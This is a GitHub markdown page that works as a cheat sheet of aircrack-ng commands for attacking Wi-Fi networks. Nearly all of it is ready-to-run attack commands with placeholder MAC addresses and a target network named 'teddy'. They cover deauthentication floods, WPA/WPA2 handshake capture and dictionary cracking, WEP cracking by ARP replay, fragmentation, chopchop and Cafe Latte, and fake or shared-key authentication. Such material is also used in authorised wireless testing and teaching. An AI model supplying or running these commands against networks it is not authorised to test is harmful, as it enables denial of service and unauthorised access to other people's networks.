Skip to content

Latest commit

 

History

History
190 lines (130 loc) · 4.74 KB

Use-attacks.md

File metadata and controls

190 lines (130 loc) · 4.74 KB

All usage of attacks by aircrack-ng

In this example

  • wlan0 is the name of your interface in manager mode
  • mon0 is the name of your interface in monitor mode
  • teddy is the name of your target network
  • 00:14:6C:7E:40:80 is the bssid of target network
  • 00:09:5B:EB:C5:2B is the bssid of your network
  • -c X is the channel of target network
  • out.cap is the filename to capture the WPA handshake
  • password.txt is the filename to brute force
  • password.txt is the file contains name of target network
  • crackwpa is the database name for cracking password
  • sharedkey.xor is the name of file containing the PRGA xor bits

Scan network around

airmon-ng check kill
airmon-ng start wlan0
airodump-ng mon0

image

Deauthentication

You can try it: https://github.com/lucthienphong1120/xDeauth

aireplay-ng --deauth 0 -a 00:14:6C:7E:40:80 mon0
or
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 mon0

Ctrl+C to stop deauth

WPA/WPA2 Handshake capture

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0
aireplay-ng --deauth 0 -a 00:14:6C:7E:40:80 mon0
ls

Cracking WPA/WPA2

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0
aireplay-ng --deauth 0 -a 00:14:6C:7E:40:80 mon0
(wait handshake)
aircrack-ng -w password.txt out*.cap

ARP Request Replay Attack

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0
aireplay-ng -0 10 -a 00:14:6C:7E:40:80 mon0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0

Crack WEP by ARP request reinjection

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out mon0
aireplay-ng -1 100 -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0
aireplay-ng -3 0 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0
(wait to capture about 70.000 packet)
aircrack-ng -a 1 out*.cap

Speed up cracking use database

sudo apt install sqlite3
airolib-ng crackwpa --import passwd password.txt
airolib-ng crackwpa --import essid essid.txt
airolib-ng crackwpa --stats # to check information about your database before batch
airolib-ng crackwpa --clean all # to clean the database from old junk and integrity check
(you can skip 2 lines above)
airolib-ng crackwpa --batch
aircrack-ng -r crackwpa out*.cap

Passlist Generation tools

Aircrack often uses brute force with some other tools as follows:

crunch [min] [max] [charset] -t [pattern] -o [path file]

Interactive packet replay

Natural Packet Replay

aireplay-ng -2 -b 00:14:6C:7E:40:80 -d 00:09:5B:EB:C5:2B -t 1 mon0

Modified Packet Replay

aireplay-ng -2 -b 00:14:6C:7E:40:80 -t 1 -c 00:09:5B:EB:C5:2B -p 0841 mon0

Rebroadcast the packet and thereby generate new IVs

aireplay-ng -2 -p 0841 -c 00:09:5B:EB:C5:2B -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82  mon0

Fake authentication

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0

Another variation

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0

Shared key fake authentication

Start interface monitor mode on AP channel

airmon-ng start wlan0 6
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w sharedkey mon0
(wait AUTH=SKA)
ls

Deauthenticate a connected client

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 mon0

00:0F:B5:34:30:30 is the MAC address of the client you are deauthing

Perform Shared Key Fake Authentication

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B -y sharedkey*.xor mon0

Fragmentation Attack

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0

Crack WEP with KoreK chopchop

aireplay-ng -4 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B mon0

Chopchop Without Authentication

aireplay-ng -4 -b 00:14:6C:7E:40:80 mon0

Crack WEP with Cafe Latte

aireplay-ng -6 -b 00:14:6C:7E:40:80 -h 00:09:5B:EB:C5:2B -D mon0

ARP amplification with packetforge-ng

Read more: https://www.aircrack-ng.org/doku.php?id=arp_amplification